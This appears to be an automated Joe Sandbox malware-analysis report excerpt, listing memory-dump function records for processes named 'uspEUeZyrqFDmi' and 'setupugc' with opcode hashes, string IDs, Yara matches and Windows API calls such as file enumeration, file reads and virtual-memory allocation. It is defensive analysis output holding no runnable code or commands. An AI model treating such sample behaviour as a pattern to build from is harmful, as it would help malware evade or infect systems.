                                            • API String ID: 0-392141074
                                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                                            • API String ID: 0-685823316
                                            • String ID: .$P$e$i$m$o$r$x
                                            • API String ID: 0-620024284
                                            • String ID: ($-$5$8$@$]$j$}
                                            • API String ID: 0-4053083192
                                            • String ID: L$S$\$a$c$e$l
                                            • API String ID: 0-3322591375
                                            • String ID: F$P$T$f$r$x
                                            • API String ID: 0-2523166886
                                            • String ID: $i$l$o$u
                                            • API String ID: 0-2051669658
                                            • String ID: 92q$\$g-al$g-alri$ri
                                            • API String ID: 0-434512970
                                            • Opcode ID: 6ec8903db7ff6caacccf63a7f52a079cf07cd1bbd3723ebc1dce79347e6b20a7
                                            • Instruction ID: e07b8127ea0fdb922aeebdc946bfdf91fb07eb56d7e495b1e6ab4415cb4e507d
                                            • Opcode Fuzzy Hash: 6ec8903db7ff6caacccf63a7f52a079cf07cd1bbd3723ebc1dce79347e6b20a7
                                            • Instruction Fuzzy Hash: D0E0D871D1424CABDB04EFE8D907BEEBBB4EF06200F1049D9C8549B351E3759604C785
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $e$k$o
                                            • API String ID: 0-3624523832
                                            • Opcode ID: ce7b0793bbba39fb1fcf83f1dcd5e0f12d53632f0721fa6ddb4b89a455289521
                                            • Instruction ID: 518e6fea374c451c6ccf95fc99f7a7e9ec7fc54c70b166512538769fb6d61bd3
                                            • Opcode Fuzzy Hash: ce7b0793bbba39fb1fcf83f1dcd5e0f12d53632f0721fa6ddb4b89a455289521
                                            • Instruction Fuzzy Hash: 13B1E8B5A00708ABDB24DFA8CC85FEFB7F9AF88704F108558F659A7240D675AA418B50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $e$h$o
                                            • API String ID: 0-3662636641
                                            • Opcode ID: 7dde154f149c934ed489ae539cd67fab72e1ffec1dcdc85d19b3957b364cb7c5
                                            • Instruction ID: e51c48005802ad603bcdef915561be04a493c827b6afcfda5a234ec27713c21f
                                            • Opcode Fuzzy Hash: 7dde154f149c934ed489ae539cd67fab72e1ffec1dcdc85d19b3957b364cb7c5
                                            • Instruction Fuzzy Hash: 478162B2C4011A6AEB24EF90DD45FFF73BCDF85704F0051EAA509A6140EA787B448BA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                            • API String ID: 0-2877786613
                                            • Opcode ID: 8a0d6b1b750c573a178be3c87d810651b3df272a4b63ebd9158a86dcf6e65da5
                                            • Instruction ID: a66c6a33199c04a733d09b6f8e27f16c6451ff9ab0065038e363703f67a1c9b9
                                            • Opcode Fuzzy Hash: 8a0d6b1b750c573a178be3c87d810651b3df272a4b63ebd9158a86dcf6e65da5
                                            • Instruction Fuzzy Hash: CD411D755111187AFB01EF90CC42FEF7BBC9F96704F009149FA04AA280E778B605C7A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                            • API String ID: 0-2877786613
                                            • Opcode ID: 3bc24011b10d284fc5dff29e8f73a40b65053b8f338017c60023720cb3989166
                                            • Instruction ID: 148296852ff8c673f2399fd7d3f13bfe0fb993988790e79cd26517be6cf6bc9c
                                            • Opcode Fuzzy Hash: 3bc24011b10d284fc5dff29e8f73a40b65053b8f338017c60023720cb3989166
                                            • Instruction Fuzzy Hash: 5F311F755111187AFB11EF90CC42FEF7BBC9F96704F00514AFA04AA280EB78B645C7A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $e$h$o
                                            • API String ID: 0-3662636641
                                            • Opcode ID: 6b7d8320a6838d164e32378140d7cc152ae617d482e67c06b2d76ecf25e55da9
                                            • Instruction ID: 99af63d53f5cdcecfa7ec040d8181375ebe77963bff57794940e06b44664216b
                                            • Opcode Fuzzy Hash: 6b7d8320a6838d164e32378140d7cc152ae617d482e67c06b2d76ecf25e55da9
                                            • Instruction Fuzzy Hash: 7E415571C4022ABAEB14EF64DD45FEF73B8EF44704F0091EA9509A6140EB7877448FA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0$0$3$8
                                            • API String ID: 0-3632578322
                                            • Opcode ID: 2a50cbad33028d612e83361338f560a0021036c9e450ea2630aa776ca2a0077d
                                            • Instruction ID: aaf8fddd2a6b39e9caa48bb4f894b907278d8c523e38eebd43216701aeabc832
                                            • Opcode Fuzzy Hash: 2a50cbad33028d612e83361338f560a0021036c9e450ea2630aa776ca2a0077d
                                            • Instruction Fuzzy Hash: 59312CB1A10209ABEF14DFA4DC41BFE77F8EF48308F045199E908A7240E775BA058BE5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $e$k$o
                                            • API String ID: 0-3624523832
                                            • Opcode ID: 136e885c14003a509e1df039e871936028a7ce1d7c72047fc2554ca594c292fb
                                            • Instruction ID: a7ecec4cb655dc8e1d16b2062ce9c0af441eaf772fdd0cacb169ae2ce6e117fe
                                            • Opcode Fuzzy Hash: 136e885c14003a509e1df039e871936028a7ce1d7c72047fc2554ca594c292fb
                                            • Instruction Fuzzy Hash: D111C8B2900218ABDB14DF94D8C5ADEFBB9FF48314F04825DE919AB201D775A544CBA0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $e$k$o
                                            • API String ID: 0-3624523832
                                            • Opcode ID: 09fb8faef188cc07b459b9941dc22ffa9b61f39f6f7d23ecf0a06c858f382c30
                                            • Instruction ID: 9cec8d1902d3d418f907ae67ffd4cf0a7ef0091443815fe0b714308c1a1ad112
                                            • Opcode Fuzzy Hash: 09fb8faef188cc07b459b9941dc22ffa9b61f39f6f7d23ecf0a06c858f382c30
                                            • Instruction Fuzzy Hash: 0301C4B2900218ABDB14DF98D885ADEF7B9FF48704F04825AE919AB201E775A544CBA0

                                            Execution Graph

                                            Execution Coverage:2.8%
                                            Dynamic/Decrypted Code Coverage:4.1%
                                            Signature Coverage:1.5%
                                            Total number of Nodes:460
                                            Total number of Limit Nodes:74
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0326C604
                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0326C63F
                                            • FindClose.KERNELBASE(?), ref: 0326C64A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNext
                                            • String ID:
                                            • API String ID: 3541575487-0
                                            • Opcode ID: fa6dc311ed47ccb88f5a2f5c31066e8fc29bd714adbf69b4eb893539495236bf
                                            • Instruction ID: 665821a203f927470bbe5a36fce1013b92151c3e5249d9bf09b5f38711e98609
                                            • Opcode Fuzzy Hash: fa6dc311ed47ccb88f5a2f5c31066e8fc29bd714adbf69b4eb893539495236bf
                                            • Instruction Fuzzy Hash: 5631A575910318BBDB20EB64CC84FFF777CAF84745F144458B959AB180EAB0AAC48BA0
                                            APIs
                                            • NtCreateFile.NTDLL(?,?,?,?,4A9873AC,?,?,?,?,?,?), ref: 032790CE
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 67770762bfd51f78d82aa628fda4528e784f95911ec6b29247aadbff0f17165e
                                            • Instruction ID: 0af63ae4c974de40305511a43c96a719e6540955a899c9f4ed09d29f3e729084
                                            • Opcode Fuzzy Hash: 67770762bfd51f78d82aa628fda4528e784f95911ec6b29247aadbff0f17165e
                                            • Instruction Fuzzy Hash: 3431C2B5A10648AFCB14DF98D881EEFB7F9EF88314F108219F919A7344D770A951CBA0
                                            APIs
                                            • NtReadFile.NTDLL(?,?,?,?,4A9873AC,?,?,?,?), ref: 03279226
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 5fb8de2c51325e33cf20a958726c354214131b0131cf036008bcef2f6367b8c1
                                            • Instruction ID: 64a2c2c91673d37d95733ce45b4192f550edc93670effdd37bfe2ebc66d84cf0
                                            • Opcode Fuzzy Hash: 5fb8de2c51325e33cf20a958726c354214131b0131cf036008bcef2f6367b8c1
                                            • Instruction Fuzzy Hash: EA31F6B5A00248ABDB14DF98D841EEFB7F9EF88704F108219FD09A7340D774A951CBA1
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(03261CBB,?,03277EEF,00000000,4A9873AC,00003000,?,?,?,?,?,03277EEF,03261CBB), ref: 032794F8
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 454ab75c95555c584024a8b5792c731b3c966d355955c4dc466659014c8e5c51
                                            • Instruction ID: 83abbe492d115a23f324f51d2d75ee902af2f46f5e5ef9b684dbc2f544d25644
                                            • Opcode Fuzzy Hash: 454ab75c95555c584024a8b5792c731b3c966d355955c4dc466659014c8e5c51
                                            • Instruction Fuzzy Hash: B821F5B5A10349ABDB14DF98DC41FAFB7B9EB88300F104519FD08AB240D7B4AA518BA1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: 63de4ea6af3ddc3236bdf96bac0b669bb223df6dc87bc3ba1add14a003f8f1b5
                                            • Instruction ID: 0c674fe5376b1f0945f80975ea961124210d91cf0c4cd41a60c19c80c4f2da76
                                            • Opcode Fuzzy Hash: 63de4ea6af3ddc3236bdf96bac0b669bb223df6dc87bc3ba1add14a003f8f1b5
                                            • Instruction Fuzzy Hash: E71191759107096BD720EB64DC01FAF73ACEF84314F104109F9086B280EBB17A4187E1
                                            APIs
                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03279304
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                                            • Instruction ID: 004c2f4a495d96b6f3b9b72c0be112cd34f968073f2b1524d39ee1e0ff65ad73
                                            • Opcode Fuzzy Hash: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                                            • Instruction Fuzzy Hash: BAE04F392107047BD620FA6ACC01F9B776CEBC5655F004415FA18AB240C671B91087A4
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ea5c6f404be8f79058d26f52dead04c28e7634a3d7ab42d7892970b4dbdd60fe
                                            • Instruction ID: e598ee8b405ce5894a8abf60f1ee8b5c7387ba662dd75e68cda80c20cab78f5b
                                            • Opcode Fuzzy Hash: ea5c6f404be8f79058d26f52dead04c28e7634a3d7ab42d7892970b4dbdd60fe
                                            • Instruction Fuzzy Hash: CD90023A605814129140B1584884546401597E0306B55C061E0428555C9B248A565361
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5d4037301c954ccf3697b96b967c00b30be5d4c2e3813c72ce406544ac7cf56b
                                            • Instruction ID: b34efaa1eeb09bf7dbc10d4b49c0634cb8250504fa9a6a010a1c89d97ed990bc
                                            • Opcode Fuzzy Hash: 5d4037301c954ccf3697b96b967c00b30be5d4c2e3813c72ce406544ac7cf56b
                                            • Instruction Fuzzy Hash: 7090026A601514424140B1584804406601597E1306395C165A0558561C972889559269
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b02575550215bfac4bcc81ea4f76e0d0151765a019e9181fe1da5adf8a4be43d
                                            • Instruction ID: 9dca172164914607577425e73d77a5d18b8ff9b3b579ee09097d255b7df2623d
                                            • Opcode Fuzzy Hash: b02575550215bfac4bcc81ea4f76e0d0151765a019e9181fe1da5adf8a4be43d
                                            • Instruction Fuzzy Hash: 1B90023A60541C02D150B1584414746001587D0306F55C061A0028655D97658B5576A1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: af4d83887362650818f13504ef88335f69c89376c08dcde71a2d014a736ebf75
                                            • Instruction ID: 08ea2abe82ae9676b99459d70adbafc673fa8cf59074a1ee0686445891f02f61
                                            • Opcode Fuzzy Hash: af4d83887362650818f13504ef88335f69c89376c08dcde71a2d014a736ebf75
                                            • Instruction Fuzzy Hash: 6C90023A20141C02D180B158440464A001587D1306F95C065A0029655DDB258B5977A1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1c351f6cc492e4efe4981bd7807f69aa40eaeca8189db25cdee509e5de7b87b0
                                            • Instruction ID: 883c1c900a912910d17bc5737a7e207ca76797e80848f83ac2a258fc59bdff60
                                            • Opcode Fuzzy Hash: 1c351f6cc492e4efe4981bd7807f69aa40eaeca8189db25cdee509e5de7b87b0
                                            • Instruction Fuzzy Hash: 7E90023A20545C42D140B1584404A46002587D030AF55C061A0068695DA7358E55B661
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ed890a10f6c98ec0b3a69343e98af04a0144ab0dc63eae09c9cb1d4d64953f74
                                            • Instruction ID: e3de349e5c60aca858be2e8876e03a71beaaa999d4712602864db16fa88ff773
                                            • Opcode Fuzzy Hash: ed890a10f6c98ec0b3a69343e98af04a0144ab0dc63eae09c9cb1d4d64953f74
                                            • Instruction Fuzzy Hash: 5A90026A202414034105B1584414616401A87E0206B55C071E1018591DD63589916125
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8018939ce26d581c4c79f0d95db2857ba76dcb296da01ed4394936c8748d6611
                                            • Instruction ID: 5bac22a336df86b58f0aaed56ad94866e2fe79256511fd867233bc446af3022e
                                            • Opcode Fuzzy Hash: 8018939ce26d581c4c79f0d95db2857ba76dcb296da01ed4394936c8748d6611
                                            • Instruction Fuzzy Hash: 4D90022E221414020145F558060450B045597D6356395C065F141A591CD73189655321
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9eeff0ca7a2b87c9cb99c0e82faf59a18d51a55098a870520f0ab300e69267eb
                                            • Instruction ID: ef85128836db369159c18bb74abb54ba9670678d04f1e3bf54ab47b326032212
                                            • Opcode Fuzzy Hash: 9eeff0ca7a2b87c9cb99c0e82faf59a18d51a55098a870520f0ab300e69267eb
                                            • Instruction Fuzzy Hash: 7D90043F311414030105F55C07045070057C7D5357355C071F101D551CF731CD715131
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4a0314eac5969e65fca8b36322f92dbc1b08a86f0c23bbdea55acccaac934bcf
                                            • Instruction ID: 6ae369f9b63fad1f538e4e147a8382e872534de9e3d634e73622e556fe704a72
                                            • Opcode Fuzzy Hash: 4a0314eac5969e65fca8b36322f92dbc1b08a86f0c23bbdea55acccaac934bcf
                                            • Instruction Fuzzy Hash: BD90022A601414424140B16888449064015ABE1216755C171A099C551D966989655665
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5e39ad733afbc33bd17952fdc8976ab4848e25a57a7aae2ab10d9fe972e5020a
                                            • Instruction ID: 42056aa71f64a300d4e41aba4b508b7369124d0964394070ab9009c6b2b85f2e
                                            • Opcode Fuzzy Hash: 5e39ad733afbc33bd17952fdc8976ab4848e25a57a7aae2ab10d9fe972e5020a
                                            • Instruction Fuzzy Hash: C190022A211C1442D200B5684C14B07001587D0307F55C165A0158555CDA2589615521
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e87057b4060ee8094acd1f0cc8b1dea870de8d38d7a7a7fbf46ceeff2e16edbb
                                            • Instruction ID: 25452b3166fcb1d561e68bdaf971d685e6c96705bd0b3419380c4320d64ce0a3
                                            • Opcode Fuzzy Hash: e87057b4060ee8094acd1f0cc8b1dea870de8d38d7a7a7fbf46ceeff2e16edbb
                                            • Instruction Fuzzy Hash: 7490026A34141842D100B1584414B060015C7E1306F55C065E1068555D9729CD526126
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3f4b657055d0310b2ad93f080b3196c19e1092a2aed911aff44be574f6bbf3fe
                                            • Instruction ID: 1a7adf2ce32fbf21fdba9e1b6ec4b0ee6d6c3204b5f37b44f07171bf56f9fe38
                                            • Opcode Fuzzy Hash: 3f4b657055d0310b2ad93f080b3196c19e1092a2aed911aff44be574f6bbf3fe
                                            • Instruction Fuzzy Hash: E790022A60141902D101B1584404616001A87D0246F95C072A1028556EDB358A92A131
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5b772aae63332fa68200afe5d8b88e7d3f797f5b358b7902e85a6427b490c67b
                                            • Instruction ID: 82257458b62a53d10763aae85eafa5e03fe8aa6f8e1e3de9d803ff58297e86bd
                                            • Opcode Fuzzy Hash: 5b772aae63332fa68200afe5d8b88e7d3f797f5b358b7902e85a6427b490c67b
                                            • Instruction Fuzzy Hash: 5D90026A20181803D140B5584804607001587D0307F55C061A2068556E9B398D516135
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
